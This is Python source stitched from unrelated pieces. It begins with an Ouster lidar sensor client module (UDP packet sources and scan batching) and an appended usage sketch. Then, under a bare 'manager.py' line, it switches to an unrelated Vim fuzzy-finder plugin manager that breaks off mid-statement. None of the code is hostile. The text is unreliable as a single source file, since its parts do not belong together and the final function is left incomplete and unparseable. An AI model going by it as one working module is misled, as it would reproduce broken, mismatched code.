"""Ouster sensor Python client. This module contains more idiomatic wrappers around the lower-level module generated using pybind11. """ from contextlib import closing from more_itertools import take from typing import cast, Iterable, Iterator, List, Optional, Tuple from typing_extensions import Protocol from threading import Thread import time from . import _client from . import (ColHeader, SensorInfo, ImuPacket, LidarPacket, LidarScan, Packet) class ClientError(Exception): """Base class for client errors.""" pass class ClientTimeout(ClientError): """Raised when data does not arrive within the expected time.""" pass class ClientOverflow(ClientError): """Raised when data loss is possible due to internal buffers filling up.""" pass class PacketSource(Protocol): """Represents a single-sensor data stream.""" def __iter__(self) -> Iterator[Packet]: """A PacketSource supports ``Iterable[Packet]``. Currently defined explicitly due to: https://github.com/python/typing/issues/561 """ ... @property def metadata(self) -> SensorInfo: """Metadata associated with the packet stream.""" ... def close(self) -> None: """Release the underlying resource, if any.""" ... class Packets(PacketSource): """Create a :class:`PacketSource` from an existing iterator.""" _it: Iterator[Packet] _metadata: SensorInfo def __init__(self, it: Iterable[Packet], metadata: SensorInfo): """ Args: it: A stream of packets metadata: Metadata for the packet stream """ self._it = iter(it) self._metadata = metadata @property def metadata(self) -> SensorInfo: return self._metadata def __iter__(self) -> Iterator[Packet]: """Return the underlying iterator.""" return self._it def close(self) -> None: pass class Sensor(PacketSource): """A packet source listening on local UDP ports. Uses a separate thread that fills internal buffers without holding the GIL. Note: Make sure ``close()`` will be called on all instances before Python attempts to exit, or the interpreter will hang waiting to join the thread (like any other non-daemonized Python thread). """ _cli: _client.Client _timeout: Optional[float] _metadata: SensorInfo _pf: _client.PacketFormat _producer: Thread _cache: Optional[Tuple[_client.ClientState, bytearray]] def __init__(self, hostname: str = "localhost", lidar_port: int = 7502, imu_port: int = 7503, *, metadata: Optional[SensorInfo] = None, buf_size: int = 128, timeout: Optional[float] = 1.0, _overflow_err: bool = False, _flush_before_read: bool = True) -> None: """ Neither the ports nor udp destination configuration on the sensor will be updated. The metadata will be fetched over the network from the sensor unless explicitly provided using the ``metadata`` parameter. Args: hostname: hostname of the sensor lidar_port: UDP port to listen on for lidar data imu_port: UDP port to listen on for imu data metadata: explicitly provide metadata for the stream buf_size: number of packets to buffer before dropping data timeout: seconds to wait for packets before signaling error or None _overflow_err: if True, raise ClientOverflow _flush_before_read: if True, try to clear buffers before reading Raises: ClientError: If initializing the client fails. 
""" self._cli = _client.Client(hostname, lidar_port, imu_port, buf_size) self._timeout = timeout self._overflow_err = _overflow_err self._flush_before_read = _flush_before_read self._cache = None self._fetched_meta = "" # Fetch from sensor if not explicitly provided if metadata: self._metadata = metadata else: self._fetch_metadata() self._metadata = SensorInfo(self._fetched_meta) self._pf = _client.PacketFormat.from_info(self._metadata) # Use args to avoid capturing self causing circular reference self._producer = Thread(target=lambda cli, pf: cli.produce(pf), args=(self._cli, self._pf)) self._producer.start() def _fetch_metadata(self) -> None: if not self._fetched_meta: self._fetched_meta = self._cli.get_metadata() if not self._fetched_meta: raise ClientError("Failed to collect metadata") def write_metadata(self, path: str) -> None: """Save metadata to disk. Args: path: path to write """ self._fetch_metadata() with open(path, 'w') as f: f.write(self._fetched_meta) @property def metadata(self) -> SensorInfo: return self._metadata def _next_packet(self) -> Optional[Packet]: if self._cache is None: # Lidar packets are bigger than IMU: wastes some space but is simple buf = bytearray(self._pf.lidar_packet_size) st = self._cli.consume(buf, self._timeout or 0) else: st, buf = self._cache self._cache = None if self._overflow_err and st & _client.ClientState.OVERFLOW: raise ClientOverflow() if st & _client.ClientState.LIDAR_DATA: return LidarPacket(buf, self._metadata) elif st & _client.ClientState.IMU_DATA: return ImuPacket(buf, self._metadata) elif st == _client.ClientState.TIMEOUT: raise ClientTimeout(f"No packets received within {self._timeout}s") elif st & _client.ClientState.ERROR: raise ClientError("Client returned ERROR state") elif st & _client.ClientState.EXIT: return None raise AssertionError("Should be unreachable") def _peek(self) -> Tuple[_client.ClientState, bytearray]: if self._cache is None: # Lidar packets are bigger than IMU: wastes some space but is simple buf = bytearray(self._pf.lidar_packet_size) st = self._cli.consume(buf, self._timeout or 0) self._cache = (st, buf) return self._cache def __iter__(self) -> Iterator[Packet]: """Access the UDP data stream as an iterator. Reading may block waiting for network data for up to the specified timeout. Failing to consume this iterator faster than the data rate of the sensor may cause packets to be dropped. Raises: ClientTimeout: If no packets are received within the configured timeout. ClientError: If the client enters an unspecified error state. """ # Attempt to flush any old data before producing packets if self._flush_before_read: self.flush(full=True) while True: p = self._next_packet() if p is not None: yield p else: return def flush(self, n_frames: int = 3, *, full=False) -> int: """Drop some data to clear internal buffers. Args: n_frames: number of frames to drop full: clear internal buffers first, so data is read from the OS receive buffers (or the network) directly Raises: ClientTimeout: if a lidar packet is not received within the configured timeout. 
""" if full: self._cli.flush() last_frame = -1 n_dropped = 0 last_ts = time.monotonic() while True: st, buf = self._peek() if st & _client.ClientState.LIDAR_DATA: frame = LidarPacket(buf, self._metadata).header( ColHeader.FRAME_ID)[0] if frame != last_frame: last_frame = frame n_frames -= 1 if n_frames < 0: break last_ts = time.monotonic() if self._timeout is not None and (time.monotonic() >= last_ts + self._timeout): raise ClientTimeout( f"No packets received within {self._timeout}s") # call for effect and drop packet try: if self._next_packet() is None: break except ClientOverflow: pass n_dropped += 1 return n_dropped def buf_use(self) -> int: return self._cli.size def close(self) -> None: """Shut down producer thread and close network connection. Attributes may be unset if constructor throws an exception. """ if hasattr(self, '_cli'): self._cli.shutdown() if hasattr(self, '_producer'): self._producer.join() def __del__(self) -> None: self.close() class Scans: """An iterable stream of scans batched from a PacketSource. Batching will emit a scan every time the frame_id increments (i.e. on receiving first packet in the next scan). Reordered packets will be handled, except across frame boundaries: packets from the previous scan will be dropped. Optionally filters out incomplete frames and enforces a timeout. A batching timeout can be useful to detect when we're only receiving incomplete frames or only imu packets. Can also be configured to manage internal buffers for soft real-time applications. """ def __init__(self, source: PacketSource, *, complete: bool = False, timeout: Optional[float] = None, _max_latency: int = 0) -> None: """ Args: source: any source of packets complete: if True, only return full scans timeout: seconds to wait for a scan before error or None _max_latency: (experimental) approximate max number of frames to buffer """ self._source = source self._complete = complete self._timeout = timeout self._max_latency = _max_latency def __iter__(self) -> Iterator[LidarScan]: """Get an iterator.""" w = self._source.metadata.format.columns_per_frame h = self._source.metadata.format.pixels_per_column packets_per_frame = w // self._source.metadata.format.columns_per_packet column_window = self._source.metadata.format.column_window # If source is a sensor, make a type-specialized reference available sensor = cast(Sensor, self._source) if isinstance( self._source, Sensor) else None ls_write = _client.LidarScan(w, h) pf = _client.PacketFormat.from_info(self._source.metadata) batch = _client.ScanBatcher(w, pf) # Time from which to measure timeout start_ts = time.monotonic() it = iter(self._source) while True: try: packet = next(it) except StopIteration: return if self._timeout is not None and (time.monotonic() >= start_ts + self._timeout): raise ClientTimeout(f"No lidar scans within {self._timeout}s") if isinstance(packet, LidarPacket): if batch(packet._data, ls_write): # Got a new frame, return it and start another ls = LidarScan.from_native(ls_write) if not self._complete or ls._complete(column_window): yield ls start_ts = time.monotonic() ls_write = _client.LidarScan(w, h) # Drop data along frame boundaries to maintain _max_latency and # clear out already-batched first packet of next frame if self._max_latency and sensor is not None: buf_frames = sensor.buf_use() // packets_per_frame drop_frames = buf_frames - self._max_latency + 1 if drop_frames > 0: sensor.flush(drop_frames) batch = _client.ScanBatcher(w, pf) def close(self) -> None: """Close the underlying PacketSource.""" 
self._source.close() @property def metadata(self) -> SensorInfo: """Return metadata from the underlying PacketSource.""" return self._source.metadata @classmethod def sample( cls, hostname: str = "localhost", n: int = 1, lidar_port: int = 7502, *, metadata: Optional[SensorInfo] = None ) -> Tuple[SensorInfo, Iterator[List[LidarScan]]]: """Conveniently sample n consecutive scans from a sensor. Does not leave UDP ports open. Suitable for interactive use. Args: hostname: hostname of the sensor n: number of consecutive frames in each sample lidar_port: UDP port to listen on for lidar data metadata: explicitly provide metadata for the stream Returns: A tuple of metadata queried from the sensor and an iterator that samples n consecutive scans """ with closing(Sensor(hostname, metadata=metadata)) as sensor: metadata = sensor.metadata def next_batch() -> List[LidarScan]: with closing( Sensor(hostname, lidar_port, metadata=metadata, buf_size=n * 128, _flush_before_read=False)) as source: source.flush(full=True) scans = cls(source, timeout=1.0, complete=True, _max_latency=0) return take(n, scans) return metadata, iter(next_batch, []) @classmethod def stream(cls, hostname: str = "localhost", lidar_port: int = 7502, *, buf_size: int = 640, timeout: float = 1.0, complete: bool = True, metadata: Optional[SensorInfo] = None) -> 'Scans': """Stream scans from a sensor. Will drop frames preemptively to avoid filling up internal buffers and to avoid returning frames older than the scanning period of the sensor. Args: hostname: hostname of the sensor lidar_port: UDP port to listen on for lidar data timeout: seconds to wait for scans before signaling error complete: if True, only return full scans metadata: explicitly provide metadata for the stream """ source = Sensor(hostname, lidar_port, metadata=metadata, buf_size=buf_size, timeout=timeout, _flush_before_read=True) return cls(source, timeout=timeout, complete=complete, _max_latency=1)
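A minimal usage sketch, not part of the original module: it shows how the Scans.sample and Scans.stream helpers defined above could be exercised if this file were run directly; the hostname is a placeholder and no particular sensor is assumed.

if __name__ == "__main__":
    # Hypothetical example only; "os-sensor.local" is a placeholder hostname.
    hostname = "os-sensor.local"

    # Grab metadata plus one batch of two consecutive scans (UDP ports are
    # closed again once the batch has been taken).
    info, batches = Scans.sample(hostname, n=2)
    first_batch = next(batches)
    print("sampled", len(first_batch), "scans")

    # Stream scans continuously, dropping frames if we fall behind, and close
    # the underlying Sensor when done.
    with closing(Scans.stream(hostname, complete=False)) as scans:
        for i, scan in enumerate(take(3, scans)):
            print("streamed scan", i)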
manager.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import vim import os import sys import time import operator import itertools import threading import multiprocessing from functools import partial from functools import wraps from .instance import LfInstance from .cli import LfCli from .utils import * from .fuzzyMatch import FuzzyMatch from .asyncExecutor import AsyncExecutor is_fuzzyEngine_C = False try: import fuzzyEngine is_fuzzyEngine_C = True cpu_count = multiprocessing.cpu_count() lfCmd("let g:Lf_fuzzyEngine_C = 1") except ImportError: lfCmd("let g:Lf_fuzzyEngine_C = 0") is_fuzzyMatch_C = False try: import fuzzyMatchC is_fuzzyMatch_C = True lfCmd("let g:Lf_fuzzyMatch_C = 1") except ImportError: lfCmd("let g:Lf_fuzzyMatch_C = 0") if sys.version_info >= (3, 0): def isAscii(str): try: str.encode("ascii") return True except UnicodeEncodeError: return False else: def isAscii(str): try: str.decode("ascii") return True except UnicodeDecodeError: return False def modifiableController(func): @wraps(func) def deco(self, *args, **kwargs): if self._getExplorer().getStlCategory() in ("Search_History", "Cmd_History"): return func(self, *args, **kwargs) self._getInstance().buffer.options['modifiable'] = True func(self, *args, **kwargs) self._getInstance().buffer.options['modifiable'] = False return deco #***************************************************** # Manager #***************************************************** class Manager(object): def __init__(self): self._autochdir = 0 self._instance = None self._cli = LfCli() self._explorer = None self._content = [] self._index = 0 self._help_length = 0 self._show_help = False self._selections = {} self._highlight_pos = [] self._highlight_pos_list = [] self._highlight_refine_pos = [] self._highlight_ids = [] self._orig_line = '' self._launched = False self._ctrlp_pressed = False self._fuzzy_engine = None self._result_content = [] self._reader_thread = None self._timer_id = None self._highlight_method = lambda : None self._orig_cwd = None self._getExplClass() #************************************************************** # abstract methods, in fact all the functions can be overridden #************************************************************** def _getExplClass(self): """ this function MUST be overridden return the name of Explorer class """ raise NotImplementedError("Can't instantiate abstract class Manager " "with abstract methods _getExplClass") def _defineMaps(self): pass def _cmdExtension(self, cmd): """ this function can be overridden to add new cmd if return true, exit the input loop """ pass def _argaddFiles(self, files): # It will raise E480 without 'silent!' lfCmd("silent! 
argdelete *") for file in files: lfCmd("argadd %s" % escSpecial(file)) def _acceptSelection(self, *args, **kwargs): if len(args) == 0: return file = args[0] try: if not os.path.isabs(file): file = os.path.join(self._getInstance().getCwd(), lfDecode(file)) file = os.path.normpath(lfEncode(file)) if kwargs.get("mode", '') == 't': lfCmd("tab drop %s" % escSpecial(file)) else: lfCmd("hide edit %s" % escSpecial(file)) except vim.error as e: # E37 lfPrintError(e) def _getDigest(self, line, mode): """ this function can be overridden specify what part in the line to be processed and highlighted Args: mode: 0, return the full path 1, return the name only 2, return the directory name """ if mode == 0: return line elif mode == 1: return getBasename(line) else: return getDirname(line) def _getDigestStartPos(self, line, mode): """ this function can be overridden return the start position of the digest returned by _getDigest() Args: mode: 0, return the start postion of full path 1, return the start postion of name only 2, return the start postion of directory name """ if mode == 0 or mode == 2: return 0 else: return lfBytesLen(getDirname(line)) def _createHelp(self): return [] def _setStlMode(self, **kwargs): if self._cli.isFuzzy: if self._getExplorer().supportsNameOnly(): if self._cli.isFullPath: mode = 'FullPath' else: mode = 'NameOnly' else: mode = 'Fuzzy' else: mode = 'Regex' modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"} for opt in kwargs.get("arguments", {}): if opt in modes: if opt == "--regexMode": mode = 'Regex' elif self._getExplorer().supportsNameOnly(): if opt == "--nameOnly": mode = 'NameOnly' elif opt == "--fullPath": mode = 'FullPath' else: # "--fuzzy" if self._cli.isFullPath: mode = 'FullPath' else: mode = 'NameOnly' elif opt in ("--nameOnly", "--fullPath", "--fuzzy"): mode = 'Fuzzy' break self._getInstance().setStlMode(mode) self._cli.setCurrentMode(mode) def _beforeEnter(self): self._resetAutochdir() def _afterEnter(self): if "--nowrap" in self._arguments: self._getInstance().window.options['wrap'] = False self._cleanup() self._defineMaps() lfCmd("runtime syntax/leaderf.vim") if is_fuzzyEngine_C: self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False) def _beforeExit(self): if self._getInstance().window.valid: self._getInstance().cursorRow = self._getInstance().window.cursor[0] self._getInstance().helpLength = self._help_length self._help_length = 0 self._show_help = False self._cleanup() self._getExplorer().cleanup() if self._fuzzy_engine: fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine) self._fuzzy_engine = None if self._reader_thread and self._reader_thread.is_alive(): self._stop_reader_thread = True def _afterExit(self): pass def _bangEnter(self): pass def _bangReadFinished(self): pass def _getList(self, pairs): """ this function can be overridden return a list constructed from pairs Args: pairs: a list of tuple(weight, line, ...) 
""" return [p[1] for p in pairs] def _getUnit(self): """ indicates how many lines are considered as a unit """ return 1 def _supportsRefine(self): return False def _previewResult(self, preview): pass def _restoreOrigCwd(self): if self._orig_cwd is None: return # https://github.com/neovim/neovim/issues/8336 if lfEval("has('nvim')") == '1': chdir = vim.chdir else: chdir = os.chdir try: if int(lfEval("&autochdir")) == 0 and os.getcwd() != self._orig_cwd: chdir(self._orig_cwd) except: if os.getcwd() != self._orig_cwd: chdir(self._orig_cwd) def _needExit(self, line, arguments): return True def setArguments(self, arguments): self._arguments = arguments def getArguments(self): return self._arguments #************************************************************** def _needPreview(self, preview): """ Args: preview: if True, always preview the result no matter what `g:Lf_PreviewResult` is. """ preview_dict = lfEval("g:Lf_PreviewResult") category = self._getExplorer().getStlCategory() if not preview and int(preview_dict.get(category, 0)) == 0: return False if self._getInstance().window.cursor[0] <= self._help_length: return False if self._getInstance().empty() or vim.current.buffer != self._getInstance().buffer: return False if self._ctrlp_pressed == True: return True line = self._getInstance().currentLine if self._orig_line == line and self._getInstance().buffer.options['modifiable']: return False self._orig_line = line return True def _getInstance(self): if self._instance is None: self._instance = LfInstance(self._getExplorer().getStlCategory(), self._beforeEnter, self._afterEnter, self._beforeExit, self._afterExit) return self._instance def _createHelpHint(self): if self._getExplorer().getStlCategory() in ("Search_History", "Cmd_History"): return help = [] if not self._show_help: if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0': help.append('" Press <F1> for help') help.append('" ---------------------------------------------------------') else: help += self._createHelp() self._help_length = len(help) orig_row = self._getInstance().window.cursor[0] if self._getInstance().isReverseOrder(): self._getInstance().buffer.options['modifiable'] = True self._getInstance().buffer.append(help[::-1]) self._getInstance().buffer.options['modifiable'] = False lfCmd("normal! Gzb") self._getInstance().window.cursor = (orig_row, 0) else: self._getInstance().buffer.options['modifiable'] = True self._getInstance().buffer.append(help, 0) self._getInstance().buffer.options['modifiable'] = False self._getInstance().window.cursor = (orig_row + self._help_length, 0) def _hideHelp(self): self._getInstance().buffer.options['modifiable'] = True if self._getInstance().isReverseOrder(): orig_row = self._getInstance().window.cursor[0] countdown = len(self._getInstance().buffer) - orig_row - self._help_length if self._help_length > 0: del self._getInstance().buffer[-self._help_length:] self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:] lfCmd("normal! 
Gzb") if 0 < countdown < self._initial_count: self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0) else: self._getInstance().window.cursor = (len(self._getInstance().buffer), 0) self._getInstance().setLineNumber() else: del self._getInstance().buffer[:self._help_length] self._help_length = 0 def _getExplorer(self): if self._explorer is None: self._explorer = self._getExplClass()() return self._explorer def _resetAutochdir(self): if int(lfEval("&autochdir")) == 1: self._autochdir = 1 lfCmd("set noautochdir") else: self._autochdir = 0 def _setAutochdir(self): if self._autochdir == 1: # When autochdir is set, Vim will change the current working directory # to the directory containing the file which was opened or selected. lfCmd("set autochdir") def _toUp(self): adjust = False if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1: adjust = True self._setResultContent() if self._cli.pattern and self._cli.isFuzzy \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() lfCmd("norm! k") if adjust: lfCmd("norm! zt") self._getInstance().setLineNumber() lfCmd("setlocal cursorline!") # these two help to redraw the statusline, lfCmd("setlocal cursorline!") # also fix a weird bug of vim def _toDown(self): if not self._getInstance().isReverseOrder() \ and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height: self._setResultContent() lfCmd("norm! j") self._getInstance().setLineNumber() lfCmd("setlocal cursorline!") # these two help to redraw the statusline, lfCmd("setlocal cursorline!") # also fix a weird bug of vim def _pageUp(self): if self._getInstance().isReverseOrder(): self._setResultContent() if self._cli.pattern and self._cli.isFuzzy \ and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \ and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")): self._highlight_method() lfCmd('exec "norm! \<PageUp>"') self._getInstance().setLineNumber() def _pageDown(self): if not self._getInstance().isReverseOrder(): self._setResultContent() lfCmd('exec "norm! \<PageDown>"') self._getInstance().setLineNumber() def _leftClick(self): if self._getInstance().window.number == int(lfEval("v:mouse_win")): lfCmd("exec v:mouse_lnum") lfCmd("exec 'norm!'.v:mouse_col.'|'") self._getInstance().setLineNumber() self.clearSelections() exit_loop = False else: self.quit() exit_loop = True return exit_loop def _search(self, content, is_continue=False, step=0): self.clearSelections() self._clearHighlights() self._clearHighlightsPos() self._cli.highlightMatches() if not self._cli.pattern: # e.g., when <BS> or <Del> is typed self._getInstance().setBuffer(content[:self._initial_count]) self._getInstance().setStlResultsCount(len(content)) self._result_content = [] return if self._cli.isFuzzy: self._fuzzySearch(content, is_continue, step) else: self._regexSearch(content, is_continue, step) if self._getExplorer().getStlCategory() not in ["File"]: self._previewResult(False) def _filter(self, step, filter_method, content, is_continue, use_fuzzy_engine=False, return_index=False): """ Construct a list from result of filter_method(content). Args: step: An integer to indicate the number of lines to filter one time. filter_method: A function to apply `content` as parameter and return an iterable. content: The list to be filtered. 
""" unit = self._getUnit() step = step // unit * unit length = len(content) if self._index == 0: self._cb_content = [] self._result_content = content self._index = min(step, length) cur_content = content[:self._index] else: if not is_continue and not self._getInstance().empty(): self._cb_content += self._result_content if len(self._cb_content) >= step: cur_content = self._cb_content[:step] self._cb_content = self._cb_content[step:] else: cur_content = self._cb_content left = step - len(self._cb_content) self._cb_content = [] if self._index < length: end = min(self._index + left, length) cur_content += content[self._index:end] self._index = end if self._cli.isAndMode: result, highlight_methods = filter_method(cur_content) if is_continue: self._previous_result = (self._previous_result[0] + result[0], self._previous_result[1] + result[1]) result = self._previous_result else: self._previous_result = result return (result, highlight_methods) elif use_fuzzy_engine: if return_index: mode = 0 if self._cli.isFullPath else 1 tmp_content = [self._getDigest(line, mode) for line in cur_content] result = filter_method(source=tmp_content) result = (result[0], [cur_content[i] for i in result[1]]) else: result = filter_method(source=cur_content) if is_continue: self._previous_result = (self._previous_result[0] + result[0], self._previous_result[1] + result[1]) result = self._previous_result else: self._previous_result = result else: result = list(filter_method(cur_content)) if is_continue: self._previous_result += result result = self._previous_result else: self._previous_result = result return result def _fuzzyFilter(self, is_full_path, get_weight, iterable): """ return a list, each item is a pair (weight, line) """ getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) pairs = ((get_weight(getDigest(line)), line) for line in iterable) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT return (p for p in pairs if p[0] > MIN_WEIGHT) def _fuzzyFilterEx(self, is_full_path, get_weight, iterable): """ return a tuple, (weights, indices) """ getDigest = partial(self._getDigest, mode=0 if is_full_path else 1) if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2 iterable = itertools.islice(iterable, 0, None, self._getUnit()) pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable)) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT result = [p for p in pairs if p[0] > MIN_WEIGHT] if len(result) == 0: weights, indices = [], [] else: weights, indices = zip(*result) return (list(weights), list(indices)) def _refineFilter(self, first_get_weight, get_weight, iterable): getDigest = self._getDigest triples = ((first_get_weight(getDigest(line, 1)), get_weight(getDigest(line, 2)), line) for line in iterable) MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT) def _andModeFilter(self, iterable): encoding = lfEval("&encoding") use_fuzzy_engine = False cur_content = iterable weight_lists = [] highlight_methods = [] for p in self._cli.pattern: if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2 use_fuzzy_engine = True pattern = fuzzyEngine.initPattern(p) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, 
sort_results=False) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag", "Rg"]: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=False) else: filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath, sort_results=False) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False) elif is_fuzzyMatch_C and isAscii(p): pattern = fuzzyMatchC.initPattern(p) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) else: getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False) else: fuzzy_match = FuzzyMatch(p, encoding) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight2) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag", "Rg"]: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight3) else: filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, fuzzy_match.getWeight) highlight_method = partial(self._highlight, self._cli.isFullPath, fuzzy_match.getHighlights, clear=False) if use_fuzzy_engine: mode = 0 if self._cli.isFullPath else 1 tmp_content = [self._getDigest(line, mode) for line in cur_content] result = filter_method(source=tmp_content) else: result = filter_method(cur_content) for i, wl in enumerate(weight_lists): weight_lists[i] = [wl[j] for j in result[1]] weight_lists.append(result[0]) if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2 unit = self._getUnit() result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]] cur_content = list(itertools.chain.from_iterable(result_content)) else: cur_content = [cur_content[i] for i in result[1]] result_content = cur_content highlight_methods.append(highlight_method) weights = [sum(i) for i in zip(*weight_lists)] return ((weights, result_content), highlight_methods) def _fuzzySearch(self, content, is_continue, step): encoding = lfEval("&encoding") use_fuzzy_engine = False use_fuzzy_match_c = False if self._cli.isAndMode: filter_method = self._andModeFilter elif self._cli.isRefinement: if self._cli.pattern[1] == '': # e.g. 
abc; if self._fuzzy_engine and isAscii(self._cli.pattern[0]): use_fuzzy_engine = True return_index = True pattern = fuzzyEngine.initPattern(self._cli.pattern[0]) filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True) highlight_method = partial(self._highlight, True, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern[0]) getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True) filter_method = partial(self._fuzzyFilter, False, getWeight) highlight_method = partial(self._highlight, False, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding) getWeight = fuzzy_match.getWeight getHighlights = fuzzy_match.getHighlights filter_method = partial(self._fuzzyFilter, False, getWeight) highlight_method = partial(self._highlight, False, getHighlights) elif self._cli.pattern[0] == '': # e.g. ;abc if self._fuzzy_engine and isAscii(self._cli.pattern[1]): use_fuzzy_engine = True return_index = True pattern = fuzzyEngine.initPattern(self._cli.pattern[1]) filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, sort_results=not is_continue) getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False) highlight_method = partial(self._highlight, True, getHighlights, True) elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]): use_fuzzy_match_c = True pattern = fuzzyMatchC.initPattern(self._cli.pattern[1]) getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False) getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False) filter_method = partial(self._fuzzyFilter, True, getWeight) highlight_method = partial(self._highlight, True, getHighlights) else: fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding) getWeight = fuzzy_match.getWeight getHighlights = fuzzy_match.getHighlights filter_method = partial(self._fuzzyFilter, True, getWeight) highlight_method = partial(self._highlight, True, getHighlights) else: # e.g. 
abc;def if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]): is_ascii_0 = True pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0]) getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True) getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True) else: is_ascii_0 = False fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding) getWeight_0 = fuzzy_match_0.getWeight getHighlights_0 = fuzzy_match_0.getHighlights if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]): is_ascii_1 = True pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1]) getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False) getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False) else: is_ascii_1 = False fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding) getWeight_1 = fuzzy_match_1.getWeight getHighlights_1 = fuzzy_match_1.getHighlights use_fuzzy_match_c = is_ascii_0 and is_ascii_1 filter_method = partial(self._refineFilter, getWeight_0, getWeight_1) highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1) else: if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2 use_fuzzy_engine = True pattern = fuzzyEngine.initPattern(self._cli.pattern) if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath: return_index = False filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern, is_name_only=False, sort_results=not is_continue) elif self._getExplorer().getStlCategory() in ["Rg"]: if "--match-path" in self._arguments: return_index = False filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) else: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag", "Function", "History", "Cmd_History", "Search_History", "Tag"]: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=True, sort_results=not is_continue) else: return_index = True filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern, is_name_only=not self._cli.isFullPath, sort_results=not is_continue) getHighlights = 